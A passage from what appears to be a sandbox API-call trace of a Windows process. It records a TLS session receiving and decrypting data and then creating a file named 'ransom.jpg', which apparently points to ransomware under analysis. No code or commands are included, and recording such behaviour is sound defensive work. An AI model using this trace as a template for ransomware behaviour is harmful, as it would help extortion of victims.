s=0x5b0, buf=0x2825034, len=5, flags=0 | out: buf=0x2825034*) returned 5 [0065.964] recv (in: s=0x5b0, buf=0x28250c1, len=228, flags=0 | out: buf=0x28250c1*) returned 228 [0065.964] InitializeSecurityContextW (in: phCredential=0x5be348, phContext=0x5be3d8, pTargetName=0x281a5e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2825218, Reserved2=0x0, phNewContext=0x2823f74, pOutput=0x282522c, pfContextAttr=0x2822598, ptsExpiry=0x5be340 | out: phNewContext=0x2823f74, pOutput=0x282522c, pfContextAttr=0x2822598, ptsExpiry=0x5be340) returned 0x90312 [0065.964] recv (in: s=0x5b0, buf=0x28252bc, len=5, flags=0 | out: buf=0x28252bc*) returned 5 [0065.964] recv (in: s=0x5b0, buf=0x28252d5, len=1, flags=0 | out: buf=0x28252d5*) returned 1 [0065.965] InitializeSecurityContextW (in: phCredential=0x5be2a4, phContext=0x5be334, pTargetName=0x281a5e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2825348, Reserved2=0x0, phNewContext=0x2823f74, pOutput=0x282535c, pfContextAttr=0x2822598, ptsExpiry=0x5be29c | out: phNewContext=0x2823f74, pOutput=0x282535c, pfContextAttr=0x2822598, ptsExpiry=0x5be29c) returned 0x90312 [0065.965] recv (in: s=0x5b0, buf=0x28253ec, len=5, flags=0 | out: buf=0x28253ec*) returned 5 [0065.965] recv (in: s=0x5b0, buf=0x2825405, len=48, flags=0 | out: buf=0x2825405*) returned 48 [0065.965] InitializeSecurityContextW (in: phCredential=0x5be200, phContext=0x5be290, pTargetName=0x281a5e0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x28254a8, Reserved2=0x0, phNewContext=0x2823f74, pOutput=0x28254bc, pfContextAttr=0x2822598, ptsExpiry=0x5be1f8 | out: phNewContext=0x2823f74, pOutput=0x28254bc, pfContextAttr=0x2822598, ptsExpiry=0x5be1f8) returned 0x0 [0066.563] QueryContextAttributesW (in: phContext=0x2823f74, ulAttribute=0x4, pBuffer=0x2825568 | out: pBuffer=0x2825568) returned 0x0 [0066.563] QueryContextAttributesW (in: phContext=0x2823f74, ulAttribute=0x5a, pBuffer=0x28255c0 | out: pBuffer=0x28255c0) returned 0x0 [0066.564] QueryContextAttributesW (in: phContext=0x2823f74, ulAttribute=0x53, pBuffer=0x282566c | out: pBuffer=0x282566c) returned 0x0 [0066.573] CertDuplicateCertificateContext (pCertContext=0x77e0ab8) returned 0x77e0ab8 [0066.573] CertDuplicateStore (hCertStore=0x77e8cc0) returned 0x77e8cc0 [0066.574] CertEnumCertificatesInStore (hCertStore=0x77e8cc0, pPrevCertContext=0x0) returned 0x77e1148 [0066.574] CertDuplicateCertificateContext (pCertContext=0x77e1148) returned 0x77e1148 [0066.575] CertEnumCertificatesInStore (hCertStore=0x77e8cc0, pPrevCertContext=0x77e1148) returned 0x77e0ab8 [0066.575] CertDuplicateCertificateContext (pCertContext=0x77e0ab8) returned 0x77e0ab8 [0066.575] CertEnumCertificatesInStore (hCertStore=0x77e8cc0, pPrevCertContext=0x77e0ab8) returned 0x0 [0066.575] CertCloseStore (hCertStore=0x77e8cc0, dwFlags=0x0) returned 1 [0066.575] CertFreeCertificateContext (pCertContext=0x77e0ab8) returned 1 [0066.590] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x77e86a8 [0066.599] CertAddCRLLinkToStore (in: hCertStore=0x77e86a8, pCrlContext=0x77e1148, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0066.600] CertAddCRLLinkToStore (in: hCertStore=0x77e86a8, pCrlContext=0x77e0ab8, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0066.600] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x77eca30 [0066.604] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x77e0ab8, pTime=0x5be210, hAdditionalStore=0x77e86a8, pChainPara=0x5be150, dwFlags=0x0, pvReserved=0x0, ppChainContext=0x5be144 | out: ppChainContext=0x5be144) returned 1 [0066.625] LocalFree (hMem=0x77eca30) returned 0x0 [0066.626] CertDuplicateCertificateChain (pChainContext=0x77ede28) returned 0x77ede28 [0066.626] CertDuplicateCertificateContext (pCertContext=0x77e0ab8) returned 0x77e0ab8 [0066.626] CertDuplicateCertificateContext (pCertContext=0x77e0a68) returned 0x77e0a68 [0066.626] CertDuplicateCertificateContext (pCertContext=0x77e11e8) returned 0x77e11e8 [0066.627] CertFreeCertificateChain (pChainContext=0x77ede28) [0066.627] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x77ede28, pPolicyPara=0x5be2f0, pPolicyStatus=0x5be2dc | out: pPolicyStatus=0x5be2dc) returned 1 [0066.628] SetLastError (dwErrCode=0x0) [0066.630] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x77ede28, pPolicyPara=0x5be350, pPolicyStatus=0x5be304 | out: pPolicyStatus=0x5be304) returned 1 [0066.636] CertFreeCertificateChain (pChainContext=0x77ede28) [0066.637] CertFreeCertificateContext (pCertContext=0x77e0ab8) returned 1 [0066.665] CoTaskMemAlloc (cb=0x20e) returned 0x77efc58 [0066.665] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x77efc58, nSize=0x105 | out: lpBuffer="\x45f0\x77b\xe430\x77e") returned 0x0 [0066.665] CoTaskMemFree (pv=0x77efc58) [0066.666] CoTaskMemAlloc (cb=0x20e) returned 0x77efc58 [0066.666] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x77efc58, nSize=0x105 | out: lpBuffer="\x45f0\x77b\xe430\x77e") returned 0x0 [0066.666] CoTaskMemFree (pv=0x77efc58) [0066.666] CoTaskMemAlloc (cb=0x20e) returned 0x77efc58 [0066.666] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0x77efc58, nSize=0x105 | out: lpBuffer="\x45f0\x77b\xe430\x77e") returned 0x0 [0066.666] CoTaskMemFree (pv=0x77efc58) [0066.666] CoTaskMemAlloc (cb=0x20e) returned 0x77efc58 [0066.666] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0x77efc58, nSize=0x105 | out: lpBuffer="\x45f0\x77b\xe430\x77e") returned 0x0 [0066.666] CoTaskMemFree (pv=0x77efc58) [0066.715] EncryptMessage (in: phContext=0x264119c, fQOP=0x0, pMessage=0x26479a4, MessageSeqNo=0x0 | out: pMessage=0x26479a4) returned 0x0 [0066.716] send (s=0x5b0, buf=0x2646470*, len=138, flags=0) returned 138 [0066.718] setsockopt (s=0x5b0, level=65535, optname=4102, optval="\xa0\x86\x01", optlen=4) returned 0 [0066.718] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.799] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.801] DecryptMessage (in: phContext=0x264119c, pMessage=0x2657d74, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2657d74, pfQOP=0x0) returned 0x0 [0066.813] setsockopt (s=0x5b0, level=65535, optname=4102, optval="\xf4\x01", optlen=4) returned 0 [0066.813] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebf0 | out: lpPerformanceCount=0x5bebf0*=15827556255) returned 1 [0066.813] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15827562917) returned 1 [0066.815] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.816] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.816] DecryptMessage (in: phContext=0x264119c, pMessage=0x265b82c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265b82c, pfQOP=0x0) returned 0x0 [0066.816] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15827818114) returned 1 [0066.816] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.816] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.816] DecryptMessage (in: phContext=0x264119c, pMessage=0x265b94c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265b94c, pfQOP=0x0) returned 0x0 [0066.816] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15827847765) returned 1 [0066.816] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.816] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.816] DecryptMessage (in: phContext=0x264119c, pMessage=0x265ba6c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265ba6c, pfQOP=0x0) returned 0x0 [0066.816] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15827878815) returned 1 [0066.817] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.817] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.817] DecryptMessage (in: phContext=0x264119c, pMessage=0x265bb8c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265bb8c, pfQOP=0x0) returned 0x0 [0066.817] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15827969167) returned 1 [0066.817] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.818] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.818] DecryptMessage (in: phContext=0x264119c, pMessage=0x265bcac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265bcac, pfQOP=0x0) returned 0x0 [0066.818] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15827998334) returned 1 [0066.818] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.818] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.818] DecryptMessage (in: phContext=0x264119c, pMessage=0x265bdcc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265bdcc, pfQOP=0x0) returned 0x0 [0066.818] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828027859) returned 1 [0066.818] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.819] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.819] DecryptMessage (in: phContext=0x264119c, pMessage=0x265beec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265beec, pfQOP=0x0) returned 0x0 [0066.819] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828117665) returned 1 [0066.819] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.819] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.819] DecryptMessage (in: phContext=0x264119c, pMessage=0x265c00c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265c00c, pfQOP=0x0) returned 0x0 [0066.819] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828148303) returned 1 [0066.819] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.819] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.819] DecryptMessage (in: phContext=0x264119c, pMessage=0x265c12c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265c12c, pfQOP=0x0) returned 0x0 [0066.820] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828235953) returned 1 [0066.820] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.820] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.820] DecryptMessage (in: phContext=0x264119c, pMessage=0x265c24c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265c24c, pfQOP=0x0) returned 0x0 [0066.820] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828266548) returned 1 [0066.820] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.820] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.821] DecryptMessage (in: phContext=0x264119c, pMessage=0x265c36c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265c36c, pfQOP=0x0) returned 0x0 [0066.821] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828350450) returned 1 [0066.821] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.821] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.821] DecryptMessage (in: phContext=0x264119c, pMessage=0x265c48c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265c48c, pfQOP=0x0) returned 0x0 [0066.821] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828379101) returned 1 [0066.822] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.822] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.822] DecryptMessage (in: phContext=0x264119c, pMessage=0x265c5ac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265c5ac, pfQOP=0x0) returned 0x0 [0066.822] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828440634) returned 1 [0066.823] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.823] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.823] DecryptMessage (in: phContext=0x264119c, pMessage=0x265c6cc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265c6cc, pfQOP=0x0) returned 0x0 [0066.823] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828543943) returned 1 [0066.823] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.823] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.823] DecryptMessage (in: phContext=0x264119c, pMessage=0x265c7ec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265c7ec, pfQOP=0x0) returned 0x0 [0066.824] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828621211) returned 1 [0066.824] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.824] recv (in: s=0x5b0, buf=0x2653cb9, len=128, flags=0 | out: buf=0x2653cb9*) returned 128 [0066.824] DecryptMessage (in: phContext=0x264119c, pMessage=0x265c90c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265c90c, pfQOP=0x0) returned 0x0 [0066.824] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828655342) returned 1 [0066.824] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.825] recv (in: s=0x5b0, buf=0x2653cb9, len=336, flags=0 | out: buf=0x2653cb9*) returned 336 [0066.825] DecryptMessage (in: phContext=0x264119c, pMessage=0x265ca2c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265ca2c, pfQOP=0x0) returned 0x0 [0066.825] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828703924) returned 1 [0066.825] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.825] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.826] DecryptMessage (in: phContext=0x264119c, pMessage=0x265cb4c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265cb4c, pfQOP=0x0) returned 0x0 [0066.826] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15828798876) returned 1 [0066.826] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.826] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.826] DecryptMessage (in: phContext=0x264119c, pMessage=0x265cc6c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265cc6c, pfQOP=0x0) returned 0x0 [0066.828] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829053710) returned 1 [0066.828] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.828] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.828] DecryptMessage (in: phContext=0x264119c, pMessage=0x265cd8c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265cd8c, pfQOP=0x0) returned 0x0 [0066.829] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829085233) returned 1 [0066.829] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.829] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.829] DecryptMessage (in: phContext=0x264119c, pMessage=0x265ceac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265ceac, pfQOP=0x0) returned 0x0 [0066.829] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829173464) returned 1 [0066.829] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.830] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.830] DecryptMessage (in: phContext=0x264119c, pMessage=0x265cfcc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265cfcc, pfQOP=0x0) returned 0x0 [0066.830] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829203144) returned 1 [0066.830] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.830] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.830] DecryptMessage (in: phContext=0x264119c, pMessage=0x265d0ec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265d0ec, pfQOP=0x0) returned 0x0 [0066.831] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829285825) returned 1 [0066.831] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.831] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.831] DecryptMessage (in: phContext=0x264119c, pMessage=0x265d20c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265d20c, pfQOP=0x0) returned 0x0 [0066.831] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829316924) returned 1 [0066.831] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.831] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.831] DecryptMessage (in: phContext=0x264119c, pMessage=0x265d32c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265d32c, pfQOP=0x0) returned 0x0 [0066.831] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829347333) returned 1 [0066.831] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.831] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.831] DecryptMessage (in: phContext=0x264119c, pMessage=0x265d44c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265d44c, pfQOP=0x0) returned 0x0 [0066.831] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829374364) returned 1 [0066.831] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.832] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.832] DecryptMessage (in: phContext=0x264119c, pMessage=0x265d56c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265d56c, pfQOP=0x0) returned 0x0 [0066.832] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829402160) returned 1 [0066.832] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.832] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.832] DecryptMessage (in: phContext=0x264119c, pMessage=0x265d68c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265d68c, pfQOP=0x0) returned 0x0 [0066.832] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829432171) returned 1 [0066.832] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.832] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.832] DecryptMessage (in: phContext=0x264119c, pMessage=0x265d7ac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265d7ac, pfQOP=0x0) returned 0x0 [0066.832] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829462432) returned 1 [0066.832] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.832] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.833] DecryptMessage (in: phContext=0x264119c, pMessage=0x265d8cc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265d8cc, pfQOP=0x0) returned 0x0 [0066.833] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829492096) returned 1 [0066.833] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.833] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.833] DecryptMessage (in: phContext=0x264119c, pMessage=0x265d9ec, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265d9ec, pfQOP=0x0) returned 0x0 [0066.833] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829521313) returned 1 [0066.833] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.833] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.833] DecryptMessage (in: phContext=0x264119c, pMessage=0x265db0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265db0c, pfQOP=0x0) returned 0x0 [0066.833] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829548798) returned 1 [0066.833] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.833] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.833] DecryptMessage (in: phContext=0x264119c, pMessage=0x265dc2c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265dc2c, pfQOP=0x0) returned 0x0 [0066.833] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829575578) returned 1 [0066.834] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.834] recv (in: s=0x5b0, buf=0x2653cb9, len=1424, flags=0 | out: buf=0x2653cb9*) returned 1424 [0066.834] DecryptMessage (in: phContext=0x264119c, pMessage=0x265dd4c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265dd4c, pfQOP=0x0) returned 0x0 [0066.834] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829602278) returned 1 [0066.834] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.834] recv (in: s=0x5b0, buf=0x2653cb9, len=64, flags=0 | out: buf=0x2653cb9*) returned 64 [0066.834] DecryptMessage (in: phContext=0x264119c, pMessage=0x265de6c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265de6c, pfQOP=0x0) returned 0x0 [0066.834] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebb8 | out: lpPerformanceCount=0x5bebb8*=15829628561) returned 1 [0066.834] recv (in: s=0x5b0, buf=0x2653cb4, len=5, flags=0 | out: buf=0x2653cb4*) returned 5 [0066.834] recv (in: s=0x5b0, buf=0x2653cb9, len=32, flags=0 | out: buf=0x2653cb9*) returned 32 [0066.834] DecryptMessage (in: phContext=0x264119c, pMessage=0x265df8c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x265df8c, pfQOP=0x0) returned 0x0 [0066.834] SetEvent (hEvent=0x2d4) returned 1 [0066.834] QueryPerformanceCounter (in: lpPerformanceCount=0x5bebdc | out: lpPerformanceCount=0x5bebdc*=15829672307) returned 1 [0066.840] GetFullPathNameW (in: lpFileName="C:\\FD1HVy\\ransom.jpg", nBufferLength=0x105, lpBuffer=0x5be63c, lpFilePart=0x0 | out: lpBuffer="C:\\FD1HVy\\ransom.jpg", lpFilePart=0x0) returned 0x14 [0066.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb80) returned 1 [0066.840] CreateFileW (lpFileName="C:\\FD1HVy\\ransom.jpg" (normalized: "c:\\fd1hvy\\ransom.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x518 [0066.841] GetFileType (hFile=0x518) returned 0x1 [0066.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb7c) returned 1 [0066.842] GetFileType (hFile=0x518) returned 0x1 [0066.842] QueryPerformanceCounter (in: lpPerformanceCount=0x5bec04 | out: lpPerformanceCount=0x5bec04*=15830395460) returned 1 [0066.842] SetEvent (hEvent=0x2d4) returned 1 [0066.842] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5bea0c*=0x494, lpdwindex=0x5be82c | out: lpdwindex=0x5be82c) returned 0x80010115 [0066.843] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5be9ec*=0x484, lpdwindex=0x5be80c | out: lpdwindex=0x5be80c) returned 0x80010115 [0066.843] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x5be9ec*=0x48c, 